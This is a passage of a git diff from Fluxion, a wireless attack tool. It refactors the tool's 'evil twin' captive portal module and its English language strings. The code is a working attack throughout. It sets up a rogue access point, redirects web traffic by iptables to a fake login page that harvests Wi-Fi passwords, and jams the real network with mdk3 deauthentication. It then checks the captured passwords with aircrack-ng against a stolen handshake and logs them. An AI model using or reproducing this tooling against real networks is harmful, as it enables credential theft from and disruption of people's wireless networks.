-	echo -e \"    Channel ........: $CWht$APTargetChannel$CClr\"
-	echo -e \"    Vendor .........: $CGrn${APTargetMaker:-UNKNOWN}$CClr\"
+	echo -e \"    MAC ............: $CYel$FluxionTargetMAC$CClr\"
+	echo -e \"    Channel ........: $CWht$FluxionTargetChannel$CClr\"
+	echo -e \"    Vendor .........: $CGrn${FluxionTargetMaker:-UNKNOWN}$CClr\"
 	echo -e \"    Runtime ........: $CBlu\$ih\$h:\$im\$m:\$is\$s$CClr\"
 	echo -e \"    Attempts .......: $CRed\$(cat $FLUXIONWorkspacePath/hit.txt)$CClr\"
 	echo -e \"    Clients ........: $CBlu\$(cat $FLUXIONWorkspacePath/clients.txt | grep DHCPACK | awk '{print \$5}' | sort| uniq | wc -l)$CClr\"
@@ -741,7 +765,7 @@ while [ \$AuthenticatorState = \"running\" ]; do
 
 	echo -ne \"\033[K\033[u\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
 
-  if [ $APRogueAuthMode = "hash" ]; then
+  if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
     echo "
 	sleep 1" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
   fi
@@ -763,18 +787,18 @@ echo \"
 FLUXION $FLUXIONVersion.$FLUXIONRevision
 
 SSID: \\\"$staticSSID\\\"
-BSSID: $APTargetMAC ($APTargetMaker)
-Channel: $APTargetChannel
-Security: $APTargetEncryption
+BSSID: $FluxionTargetMAC ($FluxionTargetMaker)
+Channel: $FluxionTargetChannel
+Security: $FluxionTargetEncryption
 Time: \$ih\$h:\$im\$m:\$is\$s
 Password: \$(cat $FLUXIONWorkspacePath/candidate.txt)
 Mac: $(captive_portal_get_IP_MAC) ($(captive_portal_get_MAC_brand))
 IP: $(captive_portal_get_client_IP)
-\" >\"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
+\" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
 
-  if [ $APRogueAuthMode = "hash" ]; then
+  if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
     echo "
-aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log"$CClr"\"\
+aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\
 " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
   fi
 
@@ -782,7 +806,7 @@ aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDCle
 }
 
 # Generate the contents for a generic web interface
-function captive_portal_generic() {
+captive_portal_generic() {
   if [ ! -d "$FLUXIONWorkspacePath/captive_portal" ]; then
     mkdir "$FLUXIONWorkspacePath/captive_portal"
   fi
@@ -876,8 +900,8 @@ function captive_portal_generic() {
 					<form id=\"loginForm\" class=\"ui-body ui-body-b ui-corner-all\" action=\"check.php\" method=\"POST\">
 						</br>
 						<div class=\"ui-field-contain ui-responsive\" style=\"text-align:center;\">
-							<div><u>$APTargetSSID</u> ($APTargetMAC)</div>
-							<!--<div>Channel: $APTargetChannel</div>-->
+							<div><u>$FluxionTargetSSID</u> ($FluxionTargetMAC)</div>
+							<!--<div>Channel: $FluxionTargetChannel</div>-->
 						</div>
 						<div style=\"text-align:center;\">
 							<br>
@@ -907,9 +931,10 @@ function captive_portal_generic() {
 </html>" >"$FLUXIONWorkspacePath/captive_portal/index.html"
 }
 
-function captive_portal_unset_routes() {
+captive_portal_unset_routes() {
   if [ -f "$FLUXIONWorkspacePath/iptables-rules" ]; then
-    iptables-restore <"$FLUXIONWorkspacePath/iptables-rules" &>$FLUXIONOutputDevice
+    iptables-restore <"$FLUXIONWorkspacePath/iptables-rules" \
+      &> $FLUXIONOutputDevice
     sandbox_remove_workfile "$FLUXIONWorkspacePath/iptables-rules"
   else
     iptables --flush
@@ -920,19 +945,21 @@ function captive_portal_unset_routes() {
 
   # Restore system's original forwarding state
   if [ -f "$FLUXIONWorkspacePath/ip_forward" ]; then
-    sysctl -w net.ipv4.ip_forward=$(cat "$FLUXIONWorkspacePath/ip_forward") &>$FLUXIONOutputDevice
+    sysctl -w net.ipv4.ip_forward=$(
+      cat "$FLUXIONWorkspacePath/ip_forward"
+    ) &> $FLUXIONOutputDevice
     sandbox_remove_workfile "$FLUXIONWorkspacePath/ip_forward"
   fi
 
-  ip addr del $VIGWAddress/24 dev $VIGW 2>/dev/null
+  ip addr del $CaptivePortalVIGWAddress/24 dev $VIGW 2>/dev/null
 }
 
 # Set up DHCP / WEB server
 # Set up DHCP / WEB server
-function captive_portal_set_routes() {
+captive_portal_set_routes() {
   # Give an address to the gateway interface in the rogue network.
   # This makes the interface accessible from the rogue network.
-  ip addr add $VIGWAddress/24 dev $VIGW
+  ip addr add $CaptivePortalVIGWAddress/24 dev $VIGW
 
   # Save the system's routing state to restore later.
   cp "/proc/sys/net/ipv4/ip_forward" "$FLUXIONWorkspacePath/ip_forward"
@@ -948,21 +975,24 @@ function captive_portal_set_routes() {
   iptables --table nat --delete-chain
   iptables -P FORWARD ACCEPT
 
-  iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $VIGWAddress:80
-  iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $VIGWAddress:443
+  iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \
+    --to-destination $CaptivePortalVIGWAddress:80
+  iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \
+    --to-destination $CaptivePortalVIGWAddress:443
   iptables -A INPUT -p tcp --sport 443 -j ACCEPT
   iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT
   iptables -t nat -A POSTROUTING -j MASQUERADE
 }
 
-function captive_portal_stop_interface() {
+captive_portal_stop_interface() {
   captive_portal_unset_routes
 
-  if [ "$APRogueService" ]; then ap_stop
+  if [ "$APRogueService" ]; then
+    ap_stop
   fi
 }
 
-function captive_portal_start_interface() {
+captive_portal_start_interface() {
   if [ "$APRogueService" ]; then
     echo -e "$FLUXIONVLine $CaptivePortalStaringAPServiceNotice"
     ap_start
@@ -972,12 +1002,12 @@ function captive_portal_start_interface() {
     echo -e "$FLUXIONVLine Configuration for external access point device:"
     echo
 
-    fluxion_show_ap_info "$APRogueSSID" "OPEN" "$APTargetChannel" "$APRogueMAC" "$APTargetMaker"
+    fluxion_target_show "$APRogueSSID" "OPEN" "$FluxionTargetChannel" "$APRogueMAC" "$FluxionTargetMaker"
 
-    echo -e "$FLUXIONVLine IPv4 Address: ${VIGWAddress%.*}.2/24"
+    echo -e "$FLUXIONVLine IPv4 Address: ${CaptivePortalVIGWAddress%.*}.2/24"
     echo -e "$FLUXIONVLine IPv6 Address: Disabled"
-    echo -e "$FLUXIONVLine  DHCP Server: $VIGWAddress"
-    echo -e "$FLUXIONVLine   DNS Server: $VIGWAddress"
+    echo -e "$FLUXIONVLine  DHCP Server: $CaptivePortalVIGWAddress"
+    echo -e "$FLUXIONVLine   DNS Server: $CaptivePortalVIGWAddress"
     echo
 
     echo -e "$FLUXIONVLine ${CYel}Assure external AP device is available & configured before continuing!${CClr}"
@@ -988,61 +1018,97 @@ function captive_portal_start_interface() {
   captive_portal_set_routes &
   sleep 3
 
-  fuser -n tcp -k 53 67 80 443 &>$FLUXIONOutputDevice
-  fuser -n udp -k 53 67 80 443 &>$FLUXIONOutputDevice
+  fuser -n tcp -k 53 67 80 443 &> $FLUXIONOutputDevice
+  fuser -n udp -k 53 67 80 443 &> $FLUXIONOutputDevice
 }
 
-function unprep_attack() {
-  CaptivePortalState="Not Ready"
-  captive_portal_unset_attack
-  captive_portal_unset_site
-  captive_portal_unset_conn
-  captive_portal_unset_cert
-  captive_portal_unset_auth
-  captive_portal_unset_interface
-}
 
-function prep_attack() {
-  while true; do
-    captive_portal_set_interface
-    if [ $? -ne 0 ]; then break; fi
-    captive_portal_set_auth
-    if [ $? -ne 0 ]; then
-      captive_portal_unset_interface
-      continue
-    fi
-    captive_portal_set_cert
-    if [ $? -ne 0 ]; then
-      captive_portal_unset_auth
-      continue
-    fi
-    captive_portal_set_conn
-    if [ $? -ne 0 ]; then
-      captive_portal_unset_cert
-      continue
-    fi
-    captive_portal_set_site
-    if [ $? -ne 0 ]; then
-      captive_portal_unset_conn
-      continue
-    fi
-    captive_portal_set_attack
-    if [ $? -ne 0 ]; then
-      captive_portal_unset_site
-      continue
-    fi
-    CaptivePortalState="Ready"
-    break
+# ============================================================ #
+# =================== < Parse Parameters > =================== #
+# ============================================================ #
+if [ ! "$CaptivePortalCLIArguments" ]; then
+  if ! CaptivePortalCLIArguments=$(
+    getopt --options="a:j:s:c:u:h:" \
+      --longoptions="ap:,jammer:,ssl:,connectivity:,ui:,hash:" \
+      --name="Captive Portal V$FLUXIONVersion.$FLUXIONRevision" -- "$@"
+    ); then
+    echo -e "${CRed}Aborted$CClr, parameter error detected..."
+    sleep 5
+    fluxion_handle_exit
+  fi
+
+  declare -r CaptivePortalCLIArguments=$CaptivePortalCLIArguments
+
+  eval set -- "$CaptivePortalCLIArguments" # Set environment parameters.
+fi
+
+
+# ============================================================ #
+# ============= < Argument Loaded Configurables > ============ #
+# ============================================================ #
+while [ "$1" != "" -a "$1" != "--" ]; do
+  case "$1" in
+    -a|--ap)
+      CaptivePortalAccessPointInterface=$2; shift;;
+    -j|--jammer)
+      CaptivePortalJammerInterface=$2; shift;;
+    -s|--ssl)
+      CaptivePortalSSLCertificatePath=$2; shift;;
+    -c|--connectivity)
+      CaptivePortalConnectivity=$2; shift;;
+    -u|--ui)
+      CaptivePortalUserInterface=$2; shift;;
+    -h|--hash)
+      # Assuming hash auth-mode here (the only one available as of now).
+      # WARNING: If more auth-modes are added, assume hash auth-mode here!
+      CaptivePortalHashPath=$2; shift;;
+  esac
+  shift # Shift new parameters
+done
+
+
+# ============================================================ #
+# ===================== < Fluxion Hooks > ==================== #
+# ============================================================ #
+attack_targetting_interfaces() {
+  interface_list_wireless
+  local interface
+  for interface in "${InterfaceListWireless[@]}"; do
+    echo "$interface"
   done
+}
 
-  # Check for prep abortion.
-  if [ "$CaptivePortalState" != "Ready" ]; then
-    unprep_attack
+unprep_attack() {
+  CaptivePortalState="Not Ready"
+
+  captive_portal_unset_attack
+  captive_portal_unset_user_interface
+  captive_portal_unset_connectivity
+  captive_portal_unset_certificate
+  captive_portal_unset_authenticator
+  captive_portal_unset_ap_interface
+  captive_portal_unset_jammer_interface
+}
+
+prep_attack() {
+  local sequence=(
+    "set_jammer_interface"
+    "set_ap_interface"
+    "set_authenticator"
+    "set_certificate"
+    "set_connectivity"
+    "set_user_interface"
+    "set_attack"
+  )
+
+  if ! fluxion_do_sequence captive_portal sequence[@]; then
     return 1
   fi
+
+  CaptivePortalState="Ready"
 }
 
-function stop_attack() {
+stop_attack() {
   # Attempt to find PIDs of any running authenticators.
   local authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}')
 
@@ -1050,32 +1116,35 @@ function stop_attack() {
   if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi
 
   if [ "$CaptivePortalJammerServiceXtermPID" ]; then
-    kill $(pgrep -P $CaptivePortalJammerServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice
+    kill $(pgrep -P $CaptivePortalJammerServiceXtermPID \
+      2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
     CaptivePortalJammerServiceXtermPID="" # Clear parent PID
   fi
   sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk3_blacklist.lst"
 
   # Kill captive portal web server log viewer.
   if [ "$CaptivePortalWebServiceXtermPID" ]; then
-    kill $CaptivePortalWebServiceXtermPID &>$FLUXIONOutputDevice
+    kill $CaptivePortalWebServiceXtermPID &> $FLUXIONOutputDevice
     CaptivePortalWebServiceXtermPID="" # Clear service PID
   fi
 
   # Kill captive portal web server.
   if [ "$CaptivePortalWebServicePID" ]; then
-    kill $CaptivePortalWebServicePID &>$FLUXIONOutputDevice
+    kill $CaptivePortalWebServicePID &> $FLUXIONOutputDevice
     CaptivePortalWebServicePID="" # Clear service PID
   fi
 
   # Kill python DNS service if one is found.
   if [ "$CaptivePortalDNSServiceXtermPID" ]; then
-    kill $(pgrep -P $CaptivePortalDNSServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice
+    kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \
+      2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
     CaptivePortalDNSServiceXtermPID="" # Clear parent PID
   fi
 
   # Kill DHCP service.
   if [ "$CaptivePortalDHCPServiceXtermPID" ]; then
-    kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice
+    kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID \
+      2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
     CaptivePortalDHCPServiceXtermPID="" # Clear parent PID
   fi
   sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt"
@@ -1085,7 +1154,7 @@ function stop_attack() {
   CaptivePortalState="Stopped"
 }
 
-function start_attack() {
+start_attack() {
   if [ "$CaptivePortalState" = "Running" ]; then return 0; fi
   if [ "$CaptivePortalState" != "Ready" ]; then return 1; fi
   CaptivePortalState="Running"
@@ -1095,27 +1164,41 @@ function start_attack() {
   captive_portal_start_interface
 
   echo -e "$FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice"
-  xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" -title "FLUXION AP DHCP Service" -e "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $VIGW 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" &
-  CaptivePortalDHCPServiceXtermPID=$! # Save parent's pid, to get to child later.
+  xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" \
+    -title "FLUXION AP DHCP Service" -e \
+    "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $VIGW 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" &
+  # Save parent's pid, to get to child later.
+  CaptivePortalDHCPServiceXtermPID=$!
 
   echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice"
-  xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" -title "FLUXION AP DNS Service" -e "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" &
-  CaptivePortalDNSServiceXtermPID=$! # Save parent's pid, to get to child later.
+  xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \
+    -title "FLUXION AP DNS Service" -e \
+    "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" &
+  # Save parent's pid, to get to child later.
+  CaptivePortalDNSServiceXtermPID=$!
 
   echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice"
-  lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" &>$FLUXIONOutputDevice
+  lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \
+    &> $FLUXIONOutputDevice
   CaptivePortalWebServicePID=$!
 
-  xterm $FLUXIONHoldXterm $BOTTOM -bg black -fg "#00CC00" -title "FLUXION Web Service" -e "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" &
+  xterm $FLUXIONHoldXterm $BOTTOM -bg black -fg "#00CC00" \
+    -title "FLUXION Web Service" -e \
+    "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" &
   CaptivePortalWebServiceXtermPID=$!
 
   echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice"
-  echo -e "$APTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst"
-  xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" -title "FLUXION AP Jammer Service [$APTargetSSID]" -e "mdk3 $WIMonitor d -c $APTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" &
-  CaptivePortalJammerServiceXtermPID=$! # Save parent's pid, to get to child later.
+  echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst"
+  xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \
+    -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \
+    "mdk3 $WIMonitor d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" &
+  # Save parent's pid, to get to child later.
+  CaptivePortalJammerServiceXtermPID=$!
 
   echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice"
-  xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" -title "FLUXION AP Authenticator" -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" &
+  xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" \
+    -title "FLUXION AP Authenticator" \
+    -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" &
 
 }
 
diff --git a/attacks/Captive Portal/language/en.sh b/attacks/Captive Portal/language/en.sh
index 9f50533..bbf7fb6 100755
--- a/attacks/Captive Portal/language/en.sh	
+++ b/attacks/Captive Portal/language/en.sh	
@@ -2,6 +2,8 @@
 # identifier: Captive Portal
 # description: Creates an "evil twin" access point.
 
+CaptivePortalJammerInterfaceQuery="Select an interface for jamming."
+CaptivePortalAPInterfaceQuery="Select an interface for the access point."
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 CaptivePortalInterfaceQuery="Select an interface for the captive portal."
 CaptivePortalStartingInterfaceNotice="Starting captive portal interface..."
diff --git a/language/en.sh b/language/en.sh
index eed0268..a540dea 100755
--- a/language/en.sh
+++ b/language/en.sh
@@ -59,11 +59,11 @@ FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 FLUXIONHashSourceQuery="Select a method to retrieve the handshake"
 FLUXIONHashSourcePathOption="Path to capture file"
-FLUXIONHashSourceRescanOption="Handshake directory (rescan)"
+FLUXIONHashSourceRescanOption="Rescan handshake directory"
 FLUXIONFoundHashNotice="A hash for the target AP was found."
 FLUXIONUseFoundHashQuery="Do you want to use this file?"
-FLUXIONUseFoundHashOption="Use hash"
-FLUXIONSpecifyHashPathOption="Specify hash path"
+FLUXIONUseFoundHashOption="Use hash found"
+FLUXIONSpecifyHashPathOption="Specify path to hash"
 FLUXIONHashVerificationMethodQuery="Select a method of verification for the hash"
 FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}recommended$CClr)"
 FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}unreliable$CClr)"